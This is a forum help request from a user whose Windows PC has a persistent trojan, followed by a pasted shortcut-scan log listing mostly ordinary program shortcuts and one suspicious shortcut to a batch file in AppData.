Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

MTGen Trojan won't go away


  • This topic is locked This topic is locked
34 replies to this topic

#1 RedArach

RedArach

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 08 January 2017 - 07:25 PM

along with it's 5 root friends.  Ran  FRST, Malwarebytes, Think the kitchen sink (sarcasm, I'm fried)? and Avast has been clueless to the entire clusterbug.  

 

Shortcut findings:

 

Users shortcut scan result (x64) Version: 08-01-2017
Ran by Owner (08-01-2017 16:13:15)
Running from C:\Users\Owner\Downloads
Boot Mode: Normal
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
 
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat ()
 
 
Shortcut: C:\ProgramData\{A328A61B-C332-4C8C-A740-42F7F71DC398}\DDV.lnk -> 
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2014.lnk -> C:\Program Files\Adobe\Adobe After Effects CC 2014\Support Files\AfterFX.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Fuse CC (Preview).lnk -> C:\Program Files (x86)\Adobe\Adobe Fuse CC (Preview)\Code\Build\Output\Fuse\bin\Release\Fuse.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Illustrator CC 2015.3\Support Files\Contents\Windows\Illustrator.exe (Adobe Systems Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe (Adobe Systems Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.5.lnk -> C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe (Adobe Systems, Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}\SC_Reader.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk -> C:\Windows\Installer\{56EC47AA-5813-4FF6-8E75-544026FBEA83}\AppleSoftwareUpdateIco.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Help Documentation.lnk -> C:\Program Files\Dell Inc\Dell Edoc Viewer\EDocs.exe (Dell Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk -> C:\Windows\ehome\ehshell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk -> C:\Windows\System32\WindowsAnytimeUpgradeUI.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk -> C:\Program Files\DVD Maker\DVDMaker.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit\XSplit Gamecaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe (SplitmediaLabs)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\World of Warcraft.lnk -> D:\World of Warcraft\World of Warcraft Launcher.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Desktop Center.lnk -> C:\Program Files\Tablet\Wacom\32\WacomDesktopCenter.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Display Settings.lnk -> C:\Program Files\Tablet\Wacom\32\LCDSettings.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Tablet Preference File Utility.lnk -> C:\Program Files\Tablet\Wacom\32\PrefUtil.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wacom Tablet\Wacom Tablet Properties.lnk -> C:\Program Files\Tablet\Wacom\Professional_CPL.exe (Wacom Technology, Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SQUARE ENIX\FINAL FANTASY XIV - A Realm Reborn\FINAL FANTASY XIV - A Realm Reborn.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SQUARE ENIX\FINAL FANTASY XIV - A Realm Reborn\FINAL FANTASY XIV System Information.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivsysinfo.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\GeForce Experience.lnk -> C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\LaunchGFExperience.exe (NVIDIA Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision Photo Viewer.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstview.exe (NVIDIA Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight.lnk -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\Silverlight.Configuration.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Uninstall Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk -> C:\Windows\System32\recdisc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk -> C:\Windows\System32\msra.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech\Logitech Webcam Software.lnk -> C:\Program Files (x86)\Common Files\LogiShrd\LWSPlugins\LWS\Applets\HelpMain\launchershortcut.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes\About iTunes.lnk -> D:\Program Files\iTunes\iTunes.Resources\en.lproj\About iTunes.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes\iTunes.lnk -> D:\Program Files\iTunes\iTunes.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel\Intel® Rapid Storage Technology.lnk -> C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorUI.exe (Intel Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\iCloud Photos.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\ShellStreamsShortcut.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\iCloud.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloud.exe (Apple Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm\Heroes of the Storm.lnk -> D:\Heroes of the Storm\Heroes of the Storm.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk -> C:\Windows\System32\gameux.dll (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\Documentation.lnk -> D:\Program Files (x86)\ERUNT\README.TXT (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\ERUNT Homepage.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.URL (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\ERUNT.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.EXE (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\NTREGOPT.lnk -> D:\Program Files (x86)\ERUNT\NTREGOPT.EXE (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT\Uninstall ERUNT.lnk -> D:\Program Files (x86)\ERUNT\unins000.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN\DW WLAN Card Readme.lnk -> C:\Program Files\Dell\DW WLAN Card\Readme.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio\Dell Audio.lnk -> C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Backup and Recovery.lnk -> C:\Program Files (x86)\Dell Backup and Recovery\Dbr.exe (SoftThinks - Dell)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Digital Delivery.lnk -> C:\Program Files (x86)\Dell Digital Delivery\DeliveryTray.exe (Dell Products, LP)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Update.lnk -> C:\Program Files (x86)\Dell Update\DellUpTray.exe (Dell Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\avastui.exe (AVAST Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk -> C:\Windows\System32\printmanagement.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk -> C:\Windows\System32\calc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk -> C:\Windows\System32\displayswitch.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk -> C:\Windows\System32\NetProj.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk -> C:\Windows\System32\SoundRecorder.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk -> C:\Windows\System32\StikyNot.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk -> C:\Windows\System32\mobsync.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\Windowspowershell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\TabTip.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk -> C:\Windows\System32\rstrui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk -> C:\Windows\System32\migwiz\PostMig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk -> C:\Windows\System32\migwiz\migwiz.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\Links\Creative Cloud Files.lnk -> C:\Users\Owner\Creative Cloud Files ()
Shortcut: C:\Users\Owner\Links\Desktop.lnk -> C:\Users\Owner\Desktop ()
Shortcut: C:\Users\Owner\Links\Downloads.lnk -> C:\Users\Owner\Downloads ()
Shortcut: C:\Users\Owner\Links\Dropbox.lnk -> C:\Users\Owner\Dropbox ()
Shortcut: C:\Users\Owner\Links\Favorites.lnk -> System Folder
Shortcut: C:\Users\Owner\Links\RecentPlaces.lnk -> System Folder
Shortcut: C:\Users\Owner\Documents\Heroes of the Storm\T_115896516_363@1.lnk -> C:\Users\Owner\Documents\Heroes of the Storm\Accounts\88616997\1-Hero-1-7053406 ()
Shortcut: C:\Users\Owner\Desktop\Adobe Fuse CC (Preview).lnk -> C:\Program Files (x86)\Adobe\Adobe Fuse CC (Preview)\Code\Build\Output\Fuse\bin\Release\Fuse.exe ()
Shortcut: C:\Users\Owner\Desktop\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\Users\Owner\Desktop\DATAPART1 (D).lnk -> D:\ ()
Shortcut: C:\Users\Owner\Desktop\ERUNT.lnk -> D:\Program Files (x86)\ERUNT\ERUNT.EXE (No File)
Shortcut: C:\Users\Owner\Desktop\joker face\joker roughdraft 001 - Shortcut.lnk -> C:\Users\Owner\Desktop\keep for Tamaria\elders etc\2016-07-10 joker roughdraft\joker roughdraft 001.bmp ()
Shortcut: C:\Users\Owner\Desktop\joker face\jokerrough precolor 001 - Shortcut.lnk -> C:\Users\Owner\Desktop\keep for Tamaria\elders etc\2016-07-10 jokerrough precolor\jokerrough precolor 001.jpg ()
Shortcut: C:\Users\Owner\Creative Cloud Files (archived) (2)\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\Creative Cloud Files (archived) (1)\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\Creative Cloud Files\Adobe Illustrator CC 2015\Adobe Illustrator CC 2015.lnk -> D:\Creative Cloud Files\Adobe Illustrator CC 2015\Support Files\Contents\Windows\Illustrator.exe (No File)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk -> D:\Program Files (x86)\ERUNT\AUTOBACK.EXE (No File)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender\blender.lnk -> D:\Program Files\Blender Foundation\Blender\blender.exe (Blender Foundation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Dropbox.lnk -> C:\Users\Owner\Dropbox ()
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Illustrator CC 2015.3.lnk -> C:\Program Files\Adobe\Adobe Illustrator CC 2015.3\Support Files\Contents\Windows\Illustrator.exe (Adobe Systems Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Lightroom.lnk -> D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe (Adobe Systems)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Photoshop CC 2015.5.lnk -> C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe (Adobe Systems, Incorporated)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Public\Desktop\Adobe Creative Cloud.lnk -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\avastui.exe (AVAST Software)
Shortcut: C:\Users\Public\Desktop\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\Users\Public\Desktop\FINAL FANTASY XIV - Heavensward.lnk -> D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe (SQUARE ENIX CO., LTD.)
Shortcut: C:\Users\Public\Desktop\GeForce Experience.lnk -> C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\LaunchGFExperience.exe (NVIDIA Corporation)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Heroes of the Storm.lnk -> D:\Heroes of the Storm\Heroes of the Storm.exe (Blizzard Entertainment)
Shortcut: C:\Users\Public\Desktop\iTunes.lnk -> D:\Program Files\iTunes\iTunes.exe (Apple Inc.)
Shortcut: C:\Users\Public\Desktop\Logitech Webcam Software  .lnk -> C:\Program Files (x86)\Common Files\LogiShrd\LWSPlugins\LWS\Applets\HelpMain\launchershortcut.exe ()
